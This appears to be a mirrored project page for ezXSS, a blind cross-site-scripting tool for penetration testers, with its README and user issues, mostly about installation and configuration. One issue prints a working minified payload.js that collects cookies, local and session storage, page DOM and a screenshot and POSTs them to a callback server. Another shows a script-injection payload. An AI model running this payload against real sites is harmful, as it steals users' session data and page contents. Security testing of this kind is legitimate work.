Giter Club home page Giter Club logo

ezxss's Introduction


ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.


ezXSS is a tool that is designed to help find and exploit cross-site scripting (XSS) vulnerabilities. One of the key features of ezXSS is its ability to identify and exploit blind XSS vulnerabilities, which can be difficult to find using traditional methods.

Once an ezXSS payload is placed, the user must wait until it is triggered, at which point ezXSS will store and alert the user all the information of the vulnerable page. These reports can then be used to further identify and track important data. Payloads can even be updated to make the XSS persistent, allowing to track the infected user over all visited pages and open a reverse proxy.

Features

  • Easy to use dashboard with settings, statistics, payloads, view/share/search reports
  • 🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
  • Manage unlimited users with permissions to personal payloads & their reports
  • Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
  • Custom extra javascript payloads
  • Custom payload links to distinguish insert points
  • Extract additional pages, block, whitelist and other filters
  • Secure your login with Two-factor (2FA)
  • The following information can be collected on a vulnerable page:
    • The URL of the page
    • IP Address
    • Any page referer (or share referer)
    • The User-Agent
    • All Non-HTTP-Only Cookies
    • All Locale Storage
    • All Session Storage
    • Full HTML DOM source of the page
    • Page origin
    • Time of execution
    • Payload URL
    • Screenshot of the page
    • Extract additional defined pages
  • Triggers in all browsers, starting from Chrome 3+, IE 8+, Firefox 4+, Opera 10.5+, Safari 4+
  • much much more, and, its just ez :-)

Required

  • Server or shared web hosting with PHP 7.1 or up
  • Domain name (consider a short one or check out shortboost)
  • SSL Certificate to test on https websites (consider Cloudflare or Let's Encrypt for a free SSL)

Installation

ezXSS is ez to install with Apache, NGINX or Docker

visit the wiki for installation instructions.

Explore ezXSS hassle free

Interested in using ezXSS but don't want to install it yet? Worry not! You can access and start using ezXSS with a free account on ez.pe. Simply sign up and get started without any installation hassle.

Additionally, if you'd like to explore and test the tool before committing, there is a demo environment with admin account available at demo.ezxss.com/manage.

Please note that some features might be disabled or limited in both the free account on ez.pe and the demo environment. These limitations are in place to maintain the integrity and security of the platforms. However, you can still get a good grasp of the tool's capabilities and decide after to install it yourself.

Sponsors

Maintenance of this project is made possible by all the contributors and sponsors. I've personally worked for over 8 years on this project, taking hundreds of hours from my time. Please kindly consider becoming a sponsor, so I can continue maintaining and improving ezXSS as well as creating and releasing new projects. Current sponsors:

geeknik   GlitchSecure   VAADATA  

Become a sponsor

ezxss's People

Contributors

baldhead avatar bober182 avatar dev avatar flightkick avatar geeknik avatar geluchat avatar glitchwitch avatar haones avatar mounssif avatar redex557 avatar spzang avatar thomasorlita avatar why avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

ezxss's Issues

Options on what to collect from the page

It would be great if there was an option to select what information do you want to collect from the page.

For example, sometimes the URL (and IP) is enough and you don't want to collect the DOM and cookies (some bounty programs don't want you to do that).

Thanks

Update 4.0

Hi, when will version 4.0 be updated, and will there be multiple users?
@ssl

Cant install

  1. Downloaded last release
  2. Unziped it to the root
  3. Configured src/Database.php
  4. Opening mydomain.com/manage/install 404 NOT Found.

What is wrong, can you please help?

Added nginx support

Hello! Your program is awesome, but i see you're having only apache support in readme, while I'm using NGINX.

I've made config that works with ezXSS 3.0 for NGINX, and i will be glad if you will add it into your readme so other people wont waste their time if they're having NGINX too :)

server {
listen 80;
listen [::]:80;

root /var/www/html/ezxss;
    client_max_body_size 150m;
# Add index.php to the list if you are using PHP
index index.php index.html index.htm index.nginx-debian.html;

server_name 'YOUR DOMAIN NAME';
add_header 'Access-Control-Allow-Origin' '*';
add_header 'Access-Control-Allow-Methods' 'GET, POST';
add_header 'Access-Control-Allow-Headers' 'origin, x-requested-with, content-type';

autoindex off; 

location /
{
        if ($uri !~ "assets")
        {
                set $rule_0 1$rule_0;
        }

        if ($rule_0 = "1")
        {
                rewrite ^/(.*)$ /index.php;
        }
}

location ~ \.php$ {
	include snippets/fastcgi-php.conf;
	fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}	

}

Not "easy 2 clicks install"

First of all thats not just copy files - youre done.

Just pasting files in directory havent helped, i saw 404 on manage/install.

So you have to modify /etc/nginx/sites-available/default and add the rewrite rules in your Host's locations ( 80,443 ) and # the default / location like done below.

add_header 'Access-Control-Allow-Origin' '*';
add_header 'Access-Control-Allow-Methods' 'GET, POST';
add_header 'Access-Control-Allow-Headers' 'origin, x-requested-with, content-type';

    #Re-write Rule
    location /
    {
            rewrite ^/callback/?$ /callback.php last;
    }

    location /manage
    {
            if ($uri !~ "assets")
            {
                    set $rule_0 1$rule_0;
            }

            if ($rule_0 = "1")
            {
                    rewrite ^/(.*)$ /manage/index.php;
            }
    }
    #Rule end
    #location / {
            # First attempt to serve request as file, then
            # as directory, then fall back to displaying a 404.
    #       try_files $uri $uri/ =404;
    #}

Then i saw this : *1 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /var/www/html/manage/src/Component.php:61

So, we should install php-curl ( that wasnt done on clean system )
sudo apt-get install php-curl

Block domains doesn't actually block anything

I've got ezXSS installed and it's collecting reports and callbacks and everything is working nicely. Except when I put a domain in Settings->Block domains and tap Save, it doesn't actually stop the emails or the reports from being generated. It does save the domains in the list and they persist between sessions, so that is working.

On a related front, the Don't save report or send alert option doesn't seem to be working here either as I've gotten about 40 reports from the same domain.

Anything I can do on my end?

New reports aren't visible in /manage/reports page

Hey ,

While I was trying to see how does it work , I noticed that any new reports generated won't be visible in /manage/reports page , Although I can get the reports with the search option (searching for the domain) But it will be useless if it is working like that.

Thanks

2FA feature issue

Thank you very much for the open source project.
I have successfully installed it and tested the 2FA function. The prompt is added successfully, but when I log in again, I still only need password login, no secondary authentication.

About Payload

First of all i would like to say thank you to create this project. My issues is about the custom payload, when i create my custom payload it said my payload has been saved but i don't know where i can show my store custom payload. one more thing is i don't know how to use this project....i hope u don't mind my english.

Database issue

Hi, something seems to be wrong with the DB I created.
I created an empty db and filled the values in src/Database.php
When accessing manage/install I got 500
My first issue was because of the timezone:
[Mon Apr 13 03:28:15.271362 2020] [php7:error] [pid 16860] [client xx.xxx.xxx.xx:xxxxx] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/mydomain.com/src/Database.php:43\nStack trace:\n#0 /var/www/mydomain.com/src/Database.php(95): Database->fetch('SELECT value FR...', Array)\n#1 /var/www/mydomain.com/src/Route.php(19): Database->fetchSetting('timezone')\n#2 /var/www/mydomain.com/index.php(30): Route-> __construct()\n#3 {main}\n thrown in /var/www/mydomain.com/src/Database.php on line 43
I was able to work around this by changing src/Route.php to

      /**
      if(!empty($this->database->fetchSetting('timezone'))) {
        date_default_timezone_set($this->database->fetchSetting('timezone'));
      } else {
        date_default_timezone_set('Europe/Amsterdam');
      }
      **/
      date_default_timezone_set('Europe/Amsterdam');

Now, I get a second issue which I cannot resolve stating in my error.log:
[Mon Apr 13 13:36:48.158340 2020] [php7:error] [pid 17701] [client xx.xxx.xxx.xx:xxxxx] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/mydomain.com/src/Database.php:83\nStack trace:\n#0 /var/www/mydomain.com/src/Route.php(57): Database->rowCount('SELECT * FROM s...')\n#1 /var/www/mydomain.com/index.php(31): Route->template('install')\n#2 {main}\n thrown in /var/www/mydomain.com/src/Database.php on line 83

Any idea what I am doing wrong with my DB?

payload.js取不到当前域名

我是使用的dnmp部署的,lnmp环境,安装好以后发现访问域名,返回的js中post提交的域名是localhost,请问除了在payload.js中强制修改为当前域名外,还有没有其它办法?

function ez_n(e){return void 0!==e?e:""}function ez_cb(e){var t=new XMLHttpRequest;t.open("POST","https://localhost/callback",!0),t.setRequestHeader("Content-type","text/plain"),t.onreadystatechange=function(){4==t.readyState&&t.status},t.send(JSON.stringify(e))}function ez_hL(){try{ez_rD.uri=ez_n(location.toString())}catch(e){ez_rD.uri=""}try{ez_rD.cookies=ez_n(document.cookie)}catch(e){ez_rD.cookies=""}try{ez_rD.referrer=ez_n(document.referrer)}catch(e){ez_rD.referrer=""}try{ez_rD["user-agent"]=ez_n(navigator.userAgent)}catch(e){ez_rD["user-agent"]=""}try{ez_rD.origin=ez_n(location.origin)}catch(e){ez_rD.origin=""}try{ez_rD.localstorage=window.localStorage;}catch(e){ez_rD.localstorage="";}try{ez_rD.sessionstorage=window.sessionStorage;}catch(e){ez_rD.sessionstorage="";}try{ez_rD.dom=ez_n(document.documentElement.outerHTML)}catch(e){ez_rD.dom=""}try{html2canvas(document.body).then(function(e){ez_rD.screenshot=ez_n(e.toDataURL()),ez_c();});}catch(e){ez_rD.screenshot="",ez_c()}function ez_c(){ez_r(),ez_cb(ez_rD)}}function ez_aE(e,t,n){e.addEventListener?e.addEventListener(t,n,!1):e.attachEvent&&e.attachEvent("on"+t,n)}ez_rD={},"complete"==document.readyState?ez_hL():ez_aE(window,"load",function(){ez_hL()});

Hello, how do you install it

Lamp environment installation ezXSS, PHP version:7.2.4 Directory and file all set www:www permissions, files can not be accessed, add probe test can be accessed. There is no other environment and plug-in requirements. Parse error: syntax error, unexpected '0' (T_LNUMBER), expecting ',' or ') in /manage/src/User.php on line 197

is it necessary to install in root directory?

Hi @ssl

I tried to install the latest release in /ezxss/ directory, updated the db file, and tried to navigate /manage/install for installation, it gets redirected to /manage/login/ not /ezxss/manage/login/ without the installation process.

help!!!

PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/html/ezxss/src/Database.php:43\nStack trace:\n#0 /var/www/html/ezxss/src/Database.php(95): Database->fetch('SELECT value FR...', Array)\n#1 /var/www/html/ezxss/src/Route.php(19): Database->fetchSetting('timezone')\n#2 /var/www/html/ezxss/index.php(35): Route->__construct()\n#3 {main}\n thrown in /var/www/html/ezxss/src/Database.php on line 43

/manage/install missing

Hello,

I tried to set up this tool, apache is up , I added the DB informationin the file /src/Database but I cannot access the /manage/install since it does not exist. Can you please tell me if I miss a step?

Thank you

Regarding Rewrite Rules

Hi,SSL

I'm trying to install ezXSS with LNMP.

However, I have some troubles when I convert .htaccess to Nginx rewrite rules.

Could you provide nginx rewrite rules, if possible? Or I have to use LAMP environment?

More than thanks.

Bug found while searching and deleting domains

Hi, when I search for a domain so I can mass remove it via the dashbaord, I get a URL formatted like https://localhost/manage/reports?search=example.com and 50 search results (would really like to see a button to display all search results) on the page. I select all, tap delete and instead of seeing more search results, there is nothing shown on the page. If I tap next, I am taken to a peculiar URL: https://localhost/manage/reports?page=1example.com which just shows me page 1 all of the reports received.

PHP: Fatal error: Uncaught Error: Call to a member function prepare() on null

Hello @ssl

Here is the error (manage/install)

Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23

full error message

[Mon Mar 18 12:27:08.553386 2019] [php7:error] [pid 2083] [client 194.34.132.57:57567] PHP Fatal error:  Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23\nStack trace:\n#0 /var/www/html/manage/src/Component.php(17): Database->fetch('SELECT * FROM s...', Array)\n#1 /var/www/html/manage/src/Component.php(13): Component->settings('timezone')\n#2 /var/www/html/manage/src/Route.php(7): Component->__construct()\n#3 /var/www/html/manage/src/Bootstrap.php(12): Route->__construct()\n#4 /var/www/html/manage/index.php(9): require('/var/www/html/m...')\n#5 {main}\n  thrown in /var/www/html/manage/src/Database.php on line 23

Performance issue when reports > 7000

Thank you for providing this amazing software to the community.

After I reached 7000 reports (ID is over 9700 though only have 7443 live reports) in my ezXSS install, I began to notice that loading https://domain/manage/dashboard after logging in was taking an inordinate amount of time to load (38 seconds to be exact). I'm curious if there are some optimizations that could be made here because when I instead load https://domain/manage/payload immediately upon logging in, the page loads instantly, however when I navigate back to https://domain/manage/dashboard, it takes longer than expected to load (38 seconds).

PHP 7.2.24-0ubuntu0.19.04.2
mysql-server 5.7.28-0ubuntu0.19.04.2

Nothing really stands out when I run mysqltuner however CPU usage appears to 100% of a single CPU core whilst this endpoint is loading. Thank you for investigating this issue.

Report #0 received via email, but Report #0 doesn't actually exist on the dashboard

Hello and thank you for this most excellent software. An issue that I've tried and failed to troubleshoot on my end is that every once in a while, I'll receive a report via email which doesn't exist in the dashboard and at the top of the email it says:

XSS Report #0
Get a fast view below or view the whole report on https://domain_name/manage/report/0

There is never a Report #0 and there is no rhyme or reason as to when or how often this happens. Even though it doesn't save the report to the DB, it did save a screenshot (this time) and I'm able to view that. Any thoughts?

Include Ansible/Docker

I made an ansible role for ezXSS that sets up ezXSS inside a docker container with a corresponding database, so ezXSS can be up and running quickly.

If you'd be interested in adding it to ezXSS, I can clean it up turn it into a pull request.

From email is not valid

Currently on line 263 of src/Route.php we see $headers[] = 'From: ezXSS';. which shows the From email is defined as ezXSS. This however is not a valid email syntax and can cause emails to bounce or goto spam in some configurations.

As a fix I suggest we implement the option to define the From email in the settings.

Alternatively we can set this as the same email the user provided earlier as done in c0af956 or set it as ezxss@{domain} as done in 300c553. If the first solution of a user configurable from email is preferred I will let you implement that. Otherwise if one of the alternatives is preferred I can submit a PR with this change.

dir

directory "manage" not exist. How i can install it? i must start from version 2.3 ?

Screenshot feature

Hi,

I see you have this feature on your to-do list, I would be interested to know your thoughts about this feature for not including it in the initial release? any specific or technical reason, as this is one of an important option to have for displaying the impact of bXSS.

Thanks for maintaining this project.

/manage/install not found (404)

Hello,

I have followed your install instructions, added database details but when i visit my site i get redirected to /manage/install however it's not existing.

Am i missing some steps? What should i do i use endora.cz hosting.

Feature Request: Share via email

The ability to share a finding over email would be an awesome feature. Currently I have my firewall set to block /manage/ for everyone besides me, but I would still like to be able to share findings as needed. Being able to essentially resend the report email but to a user specified address would address this.

500 Internal Server Error

Hi,
I'm trying to install ezXSS unfortunately I got a direct error 500.

  • Debian 10 / Apache2 (with header & rewrite mod) / php7.3 (with php-curl)

My apache2 config :

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/ezXSS

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
        <Directory /var/www/ezXSS>
                Options Indexes FollowSymLinks
                AllowOverride All
                Require all granted
        </Directory>
</VirtualHost>

And when I try a curl :

root@ezXSS:/var/www/ezXSS# curl -v 127.0.0.1/manage/install
* Expire in 0 ms for 6 (transfer 0x559904f25f50)
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x559904f25f50)
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /manage/install HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.64.0
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 12 Aug 2020 14:00:42 GMT
< Server: Apache/2.4.38 (Debian)
< Set-Cookie: PHPSESSID=mdco9pjh1gadnp666atv9f3s1v; expires=Wed, 21-Oct-2020 00:40:42 GMT; Max-Age=6000000; path=/; HttpOnly
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Access-Control-Allow-Headers: origin, x-requested-with, content-type
< Access-Control-Allow-Methods: GET, POST
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
<
* Closing connection 0

Thank's

ezXSS v3.2 - Failed to load resource: the server responded with a status of 406 ()

I just installed ezXSS v3.2 and I am facing issue with payload <script src=//domain.me></script> .

Screenshot 2020-06-04 at 4 08 47 AM

Screenshot 2020-06-04 at 4 08 47 AM

But your provided demo https://xss-game.appspot.com/level1/frame?query=test%3Cscript%20src=//demo.ezxss.com%3E%3C/script%3E works fine https://demo.ezxss.com/manage/report/1b1cc80e3a83bee557fd1b177d838ba8a7eed1ba

Although this payload works for stored xss scenario .

I also cross checked with another user who is using for long time same updated version and I confirm his one is also not working for same scenario .

Hope you will take a look in this issue .

Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23

Hello @ssl 👍

  • After pointing Database.php entries to my empty msql db.I'm getting following Exception while loading /manage/install , Am i Missing something ?
# tail /var/log/nginx/error.log 
  thrown in /var/www/html/manage/src/Database.php on line 23" while reading response header from upstream, client: 49.206.213.140, server: woot.me, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "woot.me"
2018/08/19 01:11:00 [alert] 6493#6493: *20 open socket #11 left in connection 5
2018/08/19 01:11:00 [alert] 6493#6493: aborting
2018/08/19 01:11:48 [error] 6644#6644: *5 FastCGI sent in stderr: "PHP message: PHP Fatal error:  Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23
Stack trace:
#0 /var/www/html/index.php(10): Database->fetch('SELECT * FROM s...')
#1 {main}
  thrown in /var/www/html/manage/src/Database.php on line 23" while reading response header from upstream, client: 49.206.213.140, server: woot.me, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "woot.me"
2018/08/19 01:15:15 [notice] 7755#7755: signal process started
2018/08/19 01:17:26 [notice] 7797#7797: signal process started

Regarding Installation file of ezxss

Hey,

I was installing ezxss on one of my hosting, but there is no installation file. Can anybody send me or tell me from where i can get this file.

Thanks,

Settings -> Filters not working as expected.

Hi, I have the Filters setting to "Don't save report or send alert" when a report is already known as seen here:
Screenshot_2019-07-08_10-43-24
However, I still get multiple reports in a row with the same URL. Is there something else I can do here to better prevent getting inundated with reports from the same URL? Thank you.

[Feature] Extract additional pages on initial XSS fire

Hello! I would like to suggest to add "Extracted URLs" page under "Reports" section or as a tab in Reports page.

Feature similar to what XSSHunter have now and called "Collected pages". XSS will just extract HTML of additional pages defined by user somewhere in settings and can be like "/home/foo/bar/secret.html" or "/robots.txt".

Great framework with nice UI, still need to tweak font color in some places like reports page :)

Thanks.

ngnix may expose .env secrets

The following was brought up by @geeknik.

If folks want to use .env, they'll need to properly configure their server in order to ensure the .env file doesn't get inadvertently exposed to the world. Here is a configuration example for nginx which denies access to locations starting with . other than the .well-known directory:

location ~ /\.(?!well-known).* {
    deny all;
    access_log off;
    log_not_found off;
}

Originally posted by @geeknik in #54 (comment)

Sharing report URL links to wrong report?

This just started happening recently and I have no idea how to troubleshoot it because it doesn't happen with every report, or even every other report. The only thing that the 2 URLs share in common is the .co.uk TLD. I see nothing strange in the nginx access or error logs.

Timezone Format

Hi,

What is the format that is being used to set a new time zone. I live in United States/Rochester I tired different combo and still no luck. Where does it check to validate the time zone?

Trying to access array offset on value of type bool while reading response header from upstream

Hello again! We upgraded from PHP 7.2 to 7.4 and we're seeing these errors in our Nginx error logs:

2020/05/18 00:17:41 [error] 16821#16821: *57 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/Component.php on line 42" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "GET /manage/login HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/reports"

2020/05/18 00:17:46 [error] 16821#16821: *57 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/User.php on line 64" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "POST /manage/request HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/login"

2020/05/18 01:39:22 [error] 16821#16821: *112 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/Component.php on line 274" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "GET /manage/settings HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/login"

Looking back through the logs before the 7.4 upgrade, I do not see these messages.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.